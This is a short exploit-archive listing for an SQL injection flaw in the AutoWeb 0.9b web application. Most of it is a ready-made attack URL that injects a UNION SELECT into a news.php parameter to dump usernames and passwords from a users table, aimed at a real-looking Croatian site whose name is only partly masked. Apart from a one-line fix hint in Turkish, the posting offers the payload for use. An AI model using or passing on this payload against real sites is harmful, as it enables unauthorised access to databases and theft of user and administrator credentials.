AutoWeb 0.9b SQL Injection

2013.07.23
Credit: Lazmania61
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

< ------------------- header data start ------------------- > ############################################################# # Application Name : AutoWeb 0.9b # Vulnerable Type : SqL Injection # Infection : Kullanc ve Ynetici Bilgileri ekilebilir. # Bug Fix Advice : Zararl karakterler filtrelenmelidir. # Author : Lazmania61 # Example : http://www.sXaviXdelbene.hr/news.php?id=2&lang=IT&theme=savino&news=1 ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > http://www.savinXodXene.hr/news.php?id=2&lang=IT&theme=savino&news=-1%20UnIOn%20SeLEct%201,group_concat%28username,0x94,password%29,3,4,5%20FrOm%20users < -- bug code end of -- >


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top